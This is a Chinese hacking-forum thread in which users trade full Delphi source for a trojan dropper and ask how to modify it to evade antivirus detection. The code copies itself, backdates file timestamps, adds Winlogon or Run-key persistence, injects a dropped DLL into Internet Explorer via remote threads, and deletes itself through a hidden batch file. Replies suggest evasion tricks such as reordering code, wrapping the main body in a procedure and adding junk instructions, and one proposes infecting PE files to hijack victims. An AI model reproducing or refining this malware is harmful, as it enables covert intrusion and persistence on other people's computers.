[讨论]delphi如何修改木马源码免杀
[讨论]delphi如何修改木马源码免杀议题作者:qqqqaz
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
想修改木马源码来免杀,是打乱顺序、改版本信息,还是改函数名?
通常 server 端我用 nop 填充,client 端我改函数名。server 端只有一个文件,比较容易直接改源码来免杀。
如果 server 端的 dll 文件已经免杀,把 dll 转成 res 资源文件,加在 main.dpr 中,main 代码如下。请教要如何修改才能免杀,或者改其中的单元文件?另外鸽子(灰鸽子)的代码也是同样的做法吗?:
program Main;
uses
windows,
RejoiceBase,
SysUtils2,
SysUtils,
tlhelp32,
Reg;
{$L 'SRT.obj'}
{$R RSRC.RES}
//const
var
{ ExeFiles: PChar='3885B37550B70C7A';
DLLFiles: PChar='39E145AC78292F80';
IEFiles: PChar ='A80D2686D0D48FB4446382AAE7FCCA8A';}
// Dropper configuration. The three 'X'-padded literals are fixed-width
// placeholders; together with the hex strings commented out above and the
// DeCryptStr calls commented out in the main body this looks like a builder
// overwrites them inside the compiled binary -- TODO confirm against the client.
ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; // file name of the persistent copy written under Gesy
DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; // file name of the DLL extracted from the resource and injected
IEFiles: PChar = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; // image name of the injection target; main compares it with 'IEXPLORE.EXE'
PID: DWORD;                    // result of GetProcessID(IEFiles); its -1 failure value is stored here unchecked
Process: DWORD;                // OpenProcess(PROCESS_ALL_ACCESS) handle on the target; never closed anywhere in this file
DllAllpath: string;            // full path of the dropped DLL; only assigned inside the FindWindow branch of main
StartInfo: TStartupInfo;       // handed to CreateProcess in main without being zeroed or having cb set; relies on program-level variables being zero-initialised
ProcInfo: TProcessInformation; // handles of the suspended IE process; neither resumed nor closed in this file
// Injection primitives declared 'external' with no DLL name: they are resolved
// at link time, presumably from the SRT.obj pulled in by {$L 'SRT.obj'} above,
// so VirtualAllocEx / CreateRemoteThread / VirtualFreeEx need not show up in the
// PE import table -- TODO confirm by inspecting SRT.obj. WriteProcessMemory,
// OpenProcess, GetProcAddress and GetModuleHandle are still imported normally
// through the Windows unit, so the import table remains a usable indicator.
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
// Shadows SysUtils.FileExists with shlwapi!PathFileExistsA (also used by
// RandomFilename). Declaring the parameter as 'string' relies on a Delphi
// AnsiString being passed as a plain char pointer -- fragile, but it is what
// the code depends on (pre-Unicode Delphi assumed).
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
//----------------修改文件时间函数
type
// Selects which of the three file timestamps SetFileTimesHelper rewrites.
// (The original comment also named a SetDirTimesHelper; no such routine
// exists in this file.)
TFileTimes = (ftLastAccess, ftLastWrite, ftCreation);
// Timestomping helper: sets exactly one of a file's timestamps (chosen by
// Times) to DateTime. SystemTimeToFileTime expects UTC and the local-time
// conversion on the commented-out line was dropped, so DateTime is effectively
// written as UTC. Returns False if the file cannot be opened for writing or
// any conversion / SetFileTime step fails; no exception is raised.
// Forensic note (NTFS behaviour, not visible here): SetFileTime rewrites only
// the $STANDARD_INFORMATION times; the $FILE_NAME times are untouched, so the
// two can be compared to spot this manipulation.
function SetFileTimesHelper(const FileName: string; const DateTime: TDateTime; Times: TFileTimes): Boolean;
var
Handle: THandle;
FileTime: TFileTime;
SystemTime: TSystemTime;
begin
Result := False;
// OPEN_EXISTING: a path that does not exist yet yields INVALID_HANDLE_VALUE and a False result.
Handle := CreateFile(PChar(FileName), GENERIC_WRITE, FILE_SHARE_READ, nil,OPEN_EXISTING, 0, 0);
if Handle <> INVALID_HANDLE_VALUE then
try
//SysUtils.DateTimeToSystemTime(DateTimeToLocalDateTime(DateTime), SystemTime);
SysUtils.DateTimeToSystemTime(DateTime, SystemTime);
if Windows.SystemTimeToFileTime(SystemTime, FileTime) then
begin
// SetFileTime argument order is (creation, last-access, last-write);
// nil leaves the corresponding timestamp unchanged.
case Times of
ftLastAccess:
Result := SetFileTime(Handle, nil, @FileTime, nil);
ftLastWrite:
Result := SetFileTime(Handle, nil, nil, @FileTime);
ftCreation:
Result := SetFileTime(Handle, @FileTime, nil, nil);
end;
end;
finally
CloseHandle(Handle);   // released on every path once opened
end;
end;
// Convenience wrapper: set only the last-access time. Not called anywhere in
// this file -- main calls SetFileTimesHelper directly and never uses
// ftLastAccess, so the access time of the dropped files is left untouched.
function SetFileLastAccess(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftLastAccess);
end;
// Convenience wrapper: set only the last-write (modified) time.
// Not called in this file; main invokes SetFileTimesHelper directly.
function SetFileLastWrite(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftLastWrite);
end;
// Convenience wrapper: set only the creation time.
// Not called in this file; main invokes SetFileTimesHelper directly.
function SetFileCreation(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftCreation);
end;
//----------------修改文件时间函数
// Self-deletion. Writes a batch file that loops until this executable can be
// deleted, then deletes itself, and launches it hidden at idle priority.
// Artifacts worth hunting: <Gesy>\Deleteme.bat on disk (its content embeds
// the full path of the original dropper) and a hidden cmd.exe child that spins
// on 'goto try' for as long as the dropper's image is still locked.
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
// DelValue is defined outside this file (Reg unit). The NoRealMode policy
// under WinOldApp looks like a Win9x-era carry-over; its purpose here is
// unclear -- confirm before relying on it as an indicator.
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := Gesy + 'Deleteme.bat';   // Gesy: directory path defined outside this file
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');   // busy-loop until the exe is no longer in use
WriteLn(F, 'del %0');                                           // finally remove the batch file itself
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);   // cb is left 0 as well
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;                // no visible console for the batch
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
// Appends a random number (0..9998) to the base name of aFilename, keeping
// directory and extension, and retries until the result does not exist.
// FileExists here is the shlwapi PathFileExistsA import declared above.
// No Randomize call is visible in this file, so unless a unit outside it
// seeds RandSeed the sequence is the default one -- adequate for picking an
// unused name, not for unpredictability.
function RandomFilename(aFilename: string): string;
var
Path, Filename, Ext: string;
begin
Result := aFilename;
Path := ExtractFilepath(aFilename);
Ext := ExtractFileExt(aFilename);
Filename := ExtractFilename(aFilename);
if Length(Ext) > 0 then
Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));   // strip the extension from the base name
repeat
Result := Path + Filename + inttoStr(Random(9999)) + Ext;
until not FileExists(Result);   // would loop forever only if all 9999 candidates exist
end;
// Returns the PID of the first running process whose image base name equals
// sProcName (case-insensitive), or -1 if the snapshot fails or nothing matches.
// Bug: the entry filled by Process32First is discarded and iteration begins
// with Process32Next, so the first snapshot entry is never compared
// (typically the idle pseudo-process, so harmless in practice).
// The caller in main passes the -1 failure value straight to OpenProcess.
function GetProcessID(sProcName: string): Integer;
var
hProcSnap: THandle;
pe32: TProcessEntry32;
begin
Result := -1;
hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if hProcSnap = INVALID_HANDLE_VALUE then Exit;
pe32.dwSize := SizeOf(ProcessEntry32);   // must be set before Process32First
if Process32First(hProcSnap, pe32) = True then
while Process32Next(hProcSnap, pe32) = True do
begin
if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
begin
Result := pe32.th32ProcessID;
break;
end;
end;
CloseHandle(hProcSnap);
end;
//插入进程
// Remote-thread DLL injection: allocate a page in the target process, copy the
// DLL path into it, and start a remote thread at kernel32!LoadLibraryA with
// that page as its argument. The allocate / thread / free steps go through the
// x* externals (linked from SRT.obj); WriteProcessMemory stays a normal import.
// Returns True once the remote thread was created and has finished; the
// thread's exit code (LoadLibraryA's HMODULE, 0 on failure) is never inspected,
// so True does not mean the DLL actually loaded.
// Defects, documented rather than fixed:
//  * 4096 bytes are copied from DLLPath regardless of the string's length, so
//    the write reads past the end of the path buffer and ships whatever
//    follows it in this process's memory into the target.
//  * WriteProcessMemory's result and BytesWritten are ignored.
//  * WaitForSingleObject(INFINITE) and xVirtualFreeEx run before the
//    Thread = 0 check, so a failed CreateRemoteThread still waits on handle 0,
//    and a DllMain that blocks hangs the dropper.
//  * The Process handle is closed neither here nor by the caller.
// Detection: snapshot -> OpenProcess(PROCESS_ALL_ACCESS) -> WriteProcessMemory
// -> remote thread at LoadLibraryA is the textbook behavioural chain for this technique.
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters: Pointer;
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
if Parameters = nil then Exit;
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
// LoadLibraryA's address is taken from this process; it is valid in the target because kernel32 shares the same base (ASLR-free era assumed).
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
// Program entry: install (copy self + registry persistence), drop the DLL from
// the resource, inject it into the configured host process, then self-delete.
// Gesy, judgesys, FilesetAttr, ExtractRes, IEPath and Reg.AddValue are all
// defined in units outside this file; their semantics below are inferred.
var
isSetup: Bool;          // program-level, so zero-initialised (False) unless the install branch runs
SetupPathName: string;
begin
{ ExeFiles := pchar(DeCryptStr(ExeFiles,'bwindlovexiaohan'));
DLLFiles := PChar(DeCryptStr(DLLFiles,'bwindlovexiaohan'));
IEFiles := PChar(DeCryptStr(IEFiles,'bwindlovexiaohan')); }
// Install only when NOT already running from the target path (Gesy is
// presumably a directory such as the system directory -- confirm).
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);   // presumably clears read-only/hidden/system so DeleteFile can succeed
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;                            // an undeletable previous copy aborts the whole run
Exit;                            // unreachable after Halt
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
// Timestomp the dropped copy: Now-1000 is 1000 days in the past (TDateTime
// counts days). The second ftLastWrite call is a duplicate, and ftLastAccess
// is never set, so the access time still reflects the drop -- a forensic tell.
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftCreation);
except
end;                                  // install errors are swallowed; isSetup is set regardless
isSetup := True;
// Persistence. judgesys = 3 is assumed to select the NT-family path -- confirm.
// There the Winlogon Shell value is replaced with "Explorer.exe <dropped exe>"
// (needs write access to HKLM, normally administrative); otherwise a per-user
// Run entry named after ExeFiles is written. Both are standard autorun IOCs.
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
// Single-instance check: presumably the injected DLL creates a window with
// class 'Rejoice_3.2' and title 'Windows IDE' -- confirm. Both strings are
// usable as an indicator of an already-infected host.
if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); { remove any existing copy of the DLL }
except
end;
if FileExists(DllAllpath) then { deletion failed (DLL presumably still loaded), so use a random name instead }
begin
DllAllpath := RandomFilename(DllAllpath);
// Dead code: the random path does not exist yet and SetFileTimesHelper
// opens with OPEN_EXISTING, so these three calls just return False.
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
end;
// ExtractRes is external; by its arguments it writes resource 'mydll' of
// type 'dllfile' (from RSRC.RES) to DllAllpath -- confirm in RejoiceBase.
if ExtractRes('dllfile', 'mydll', DllAllpath) then { write the DLL that will be injected }
begin
// When the target is IE, a fresh iexplore.exe is started suspended so a
// host process always exists. IEPath is not defined in this file. StartInfo
// is never zeroed (cb = 0 via zero-init), and the new process is neither
// resumed nor has its handles closed anywhere in this file.
if IEFiles = 'IEXPLORE.EXE' then
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := GetProcessID(IEFiles);                            // -1 when not found; unchecked
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID);  { open the host process } // 0 on failure; unchecked and never closed
FilesetAttr(DllAllpath, 0);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
InjectLibrary(Process, Pchar(DllAllpath));               // result ignored
end;
end;
if isSetup then
Begin
// DllAllpath is only assigned inside the FindWindow branch above; when the
// window already existed these calls operate on an empty path and fail silently.
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
ExtDelMe;   // the original (non-installed) dropper removes itself via Deleteme.bat
end;
Halt;
end.
qqqqaz:
有鸽子代码也是同样的吗?鸽子代码如何改免杀,请大家指教指教
ch4o.jt:
把主代码写成一个过程,然后在后面调用这个过程就OK了。。。
这方法过不了NOD32,它是查杀API函数的~[s:92]
[s:81] 鸽子的代码也一样,如果针对特征码查杀的话,只要打乱一下主代码的顺序编译就OK了...
qqqqaz:
我不是很明白,可否举个例程,或用以上的代码,多谢你的指点
icexiaoye:
我问题也看的晕
有了原代码还怕不能免杀????
能不能把问题说明白点
qq998:
有了源代码.怎么具体做免杀.阿.有例子吗?请问楼上.怎么"打乱一下主代码的顺序编译"???是否可以给一个例子.谢谢.
qq998:
那如何避开"API函数查到"???
icexiaoye:
引用:
这里是引用第[5 楼]的qq998于2006-10-23 16:15发表的:
有了源代码.怎么具体做免杀.阿.有例子吗?请问楼上.怎么"打乱一下主代码的顺序编译"???是否可以给一个例子.谢谢.
程序过程(比如3部分,不同功能)
A
B
C
你改成
C
B
A
icexiaoye:
引用:
这里是引用第[6 楼]的qq998于2006-10-23 16:20发表的:
那如何避开"API函数查到"??? [s:46] [s:46]
汗~
不太清楚是NOD32通过什么拦截API的
估计是HOOK API吧
qqqqaz:
多谢指教,可能我的表达能力不太好
简单的说,我不知道鸽子的和以上的server端如何才能有效的修改代码免杀
'把主代码写成一个过程,然后在后面调用这个过程就OK了'这一句话我不是很明白,可否举个例程,主代码是指main.pas吗?
ch4o.jt:
无语....
// The entire former main body moved verbatim into a procedure (the poster's
// "write the main code as a procedure" suggestion). Behaviour is unchanged:
// install + persistence, drop and inject the DLL, self-delete, Halt.
// Note for readers: this only shifts the code layout; the imports and runtime
// actions that heuristic engines key on (Run/Winlogon writes, remote-thread
// injection, self-deleting batch) are identical to the original main.
procedure fuckmain; // the former main body, now a procedure
var
isSetup: Bool;          // local here (not zero-initialised by the language); only set on the install path -- the final 'if isSetup' reads it uninitialised otherwise
SetupPathName: string;
begin
{ ExeFiles := pchar(DeCryptStr(ExeFiles,'bwindlovexiaohan'));
DLLFiles := PChar(DeCryptStr(DLLFiles,'bwindlovexiaohan'));
IEFiles := PChar(DeCryptStr(IEFiles,'bwindlovexiaohan')); }
// Install only when NOT already running from Gesy + ExeFiles (Gesy is defined outside this file).
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;   // an undeletable previous copy aborts the run
Exit;   // unreachable after Halt
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
// Timestomp to 1000 days ago; duplicate ftLastWrite call, access time never touched.
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftCreation);
except
end;   // install errors swallowed
isSetup := True;
// Persistence: Winlogon Shell (HKLM) when judgesys = 3, else a per-user Run entry.
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
// Single-instance check on a window presumably created by the injected DLL -- confirm.
if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); { remove any existing copy of the DLL }
except
end;
if FileExists(DllAllpath) then { deletion failed, so pick a random name instead }
begin
DllAllpath := RandomFilename(DllAllpath);
// Dead code: the file does not exist yet, so SetFileTimesHelper (OPEN_EXISTING) returns False.
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
end;
if ExtractRes('dllfile', 'mydll', DllAllpath) then { write the DLL that will be injected }
begin
// Start a suspended iexplore.exe as host when the target is IE; IEPath is external.
// StartInfo is never zeroed and the process is neither resumed nor closed here.
if IEFiles = 'IEXPLORE.EXE' then
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := GetProcessID(IEFiles);                            // -1 on failure; unchecked
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID);  { open the host process } // unchecked, never closed
FilesetAttr(DllAllpath, 0);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
InjectLibrary(Process, Pchar(DllAllpath));               // result ignored
end;
end;
if isSetup then
Begin
// DllAllpath is only assigned in the FindWindow branch; otherwise this stomps an empty path.
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
ExtDelMe;   // original dropper removes itself via Deleteme.bat
end;
Halt;
end;
// Program entry: everything now happens inside fuckmain, which ends with Halt.
// Wrapping the body in a procedure adds one CALL; it changes neither the
// import table nor the runtime behaviour the thread's later replies say is
// being flagged.
begin
fuckmain; // invoke the procedure
end.
或者建立另一个单元文件,把上面调用到的一些过程和函数打乱顺序放进去,然后在头部调用该单元文件就OK了.. [s:73]
asm:
有了源码,再添加一些新的功能,例如恶作剧,搜寻符合' Signature DWORD ? ' 标志
的文件写入,只要打开windows下的PE,转向到自己的站点,这样又有肉鸡,也有流量.. [s:70]
在加入新的代码的时候,也许杀毒软件病毒库检测不出来 :)
catking09:
照楼上理解那么增加部分安全代码也有效果咯? 杀不杀的判定根据一般是什么啊?
asm:
引用:
这里是引用第[12 楼]的catking09于2006-10-24 20:23发表的:
照楼上理解那么增加部分安全代码也有效果咯? 杀不杀的判定根据一般是什么啊?
添加代码能否免杀,我没测试过,只是做个估计,但是自己写个添加花指令,例如下面一个小小的东西
JNZ _test
JN _test
_test:
免杀效果应该不错...
杀不杀的判断根据,就是杀毒软件病毒分析师定的特征码和类似特征码
个人意见
ni7wo3:
NOD32 好像是检查导入表
放在过程或函数里能免杀,相当加了 CALL .....
sobiny:
如果真是查API的话
就不要那个API的函数就是了吧
最多就是麻烦一点。
API函数给的就是方便而已。
如果你有那个能力,就重写功能相同的函数来代替。
dfsy:
过NOD32??加个IF ...ELSE就过了..过卡巴6.0就用POST SYSTEM TIME 1980..就PASS了..
无意中发现的...
caijing28:
引用:
引用第2楼ch4o.jt于2006-10-23 13:41发表的:
[s:70]
把主代码写成一个过程,然后在后面调用这个过程就OK了。。。
这方法过不了NOD32,它是查杀API函数的~[s:92]
[s:81] 鸽子的代码也一样,如果针对特征码查杀的话,只要打乱一下主代码的顺序编译就OK了...
如果真的从API函数开始杀的话.那不是连WINDOWS一起杀了?
icexiaoye:
不是杀API
是针对特殊点的API拦截
然后给用户发出提示
烂香蕉:
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
是这一段 被杀了!!!
谁有办法解决嚒???
烂香蕉:
// 只要打乱一下主代码的顺序编译就OK了...
也无效
烂香蕉:
program Main;
uses
windows,
RejoiceBase,
SysUtils2,
tlhelp32,
Reg ;
{$L 'SRT.obj'}
{$R RSRC.RES}
{$R 'Down.RES' 'Down.rc'}
const
{ ExeFiles='rejoice.exe';
DLLFiles='rejoice.dll';
//IEFiles ='Explorer.exe';
IEFiles ='IEXPLORE.EXE';}
// Typed constants (assignable in classic Delphi when writable typed constants
// are enabled; nothing in this file assigns them). The commented-out originals
// give the Rejoice trojan's default file names -- rejoice.exe / rejoice.dll --
// and show the injection target was iexplore.exe with explorer.exe as the
// alternative. The 'X' literals are fixed-width placeholders, presumably
// patched in the binary by a builder -- confirm.
ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; // name of the persistent copy dropped under Gesy
DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; // name of the DLL extracted from the resource and injected
IEFiles: PChar = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'; // image name of the injection target; compared with 'IEXPLORE.EXE' in main
var
PID: DWORD;                    // result of GetProcessID(IEFiles); -1 on failure is stored unchecked
Process: DWORD;                // OpenProcess(PROCESS_ALL_ACCESS) handle; never closed in this file
DllAllpath: string;            // full path of the dropped DLL; assigned only inside the FindWindow branch of main
StartInfo: TStartupInfo;       // passed to CreateProcess without being zeroed; relies on program-level zero-initialisation (cb = 0)
ProcInfo: TProcessInformation; // handles of the suspended IE process; neither resumed nor closed in this file
// Injection primitives declared 'external' with no DLL name, so they resolve
// at link time -- presumably from SRT.obj ({$L 'SRT.obj'} above) -- and need
// not appear in the PE import table; TODO confirm by inspecting SRT.obj.
// WriteProcessMemory, OpenProcess, GetProcAddress and GetModuleHandle are
// still imported normally through the Windows unit.
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
// shlwapi!PathFileExistsA under the name FileExists (SysUtils is not in this
// variant's uses list, so nothing is shadowed here). Passing a Delphi 'string'
// to an stdcall LPCSTR parameter relies on the AnsiString-as-char-pointer layout.
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
// Self-deletion, identical to the first listing: write <Gesy>\Deleteme.bat,
// which loops until this executable can be deleted and then deletes itself,
// and run it hidden at idle priority. The batch file (containing the full
// path of the dropper) and the hidden cmd.exe child are the observable artifacts.
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
// DelValue is from the Reg unit (outside this file). Purpose of clearing the
// Win9x-era NoRealMode policy here is unclear -- confirm.
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := Gesy + 'Deleteme.bat';   // Gesy: directory path defined outside this file
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');   // spin until the exe is no longer locked
WriteLn(F, 'del %0');                                           // then remove the batch itself
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);   // cb stays 0
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;                // hidden console
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
// Appends a random number (0..9998) to the base name of aFilename, keeping
// directory and extension, until the candidate path does not exist
// (FileExists = shlwapi PathFileExistsA declared above). No Randomize call is
// visible in this file; uniqueness, not unpredictability, is all it provides.
function RandomFilename(aFilename: string): string;
var
Path, Filename, Ext: string;
begin
Result := aFilename;
Path := ExtractFilepath(aFilename);
Ext := ExtractFileExt(aFilename);
Filename := ExtractFilename(aFilename);
if Length(Ext) > 0 then
Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));   // drop the extension from the base name
repeat
Result := Path + Filename + inttoStr(Random(9999)) + Ext;
until not FileExists(Result);
end;
// PID of the first running process whose image base name matches sProcName
// (case-insensitive); -1 if the snapshot fails or nothing matches.
// Bug: the Process32First entry is discarded and the loop starts with
// Process32Next, so the first snapshot entry is never examined. main passes
// the -1 failure value straight to OpenProcess without checking.
function GetProcessID(sProcName: string): Integer;
var
hProcSnap: THandle;
pe32: TProcessEntry32;
begin
Result := -1;
hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if hProcSnap = INVALID_HANDLE_VALUE then Exit;
pe32.dwSize := SizeOf(ProcessEntry32);   // required before Process32First
if Process32First(hProcSnap, pe32) = True then
while Process32Next(hProcSnap, pe32) = True do
begin
if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
begin
Result := pe32.th32ProcessID;
break;
end;
end;
CloseHandle(hProcSnap);
end;
//插入进程
// Remote-thread DLL injection, identical to the first listing: allocate a
// page in the target, copy the DLL path into it, run a remote thread at
// kernel32!LoadLibraryA with that page as argument. Returns True once the
// remote thread was created and finished; the HMODULE exit code is never read.
// Same defects as before: a fixed 4096-byte copy over-reads past the path
// string, WriteProcessMemory's result is ignored, the wait and free happen
// before the Thread = 0 check, and the Process handle is never closed.
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters: Pointer;
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
if Parameters = nil then Exit;
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
{procedure killer;
var
f:textfile;
begin
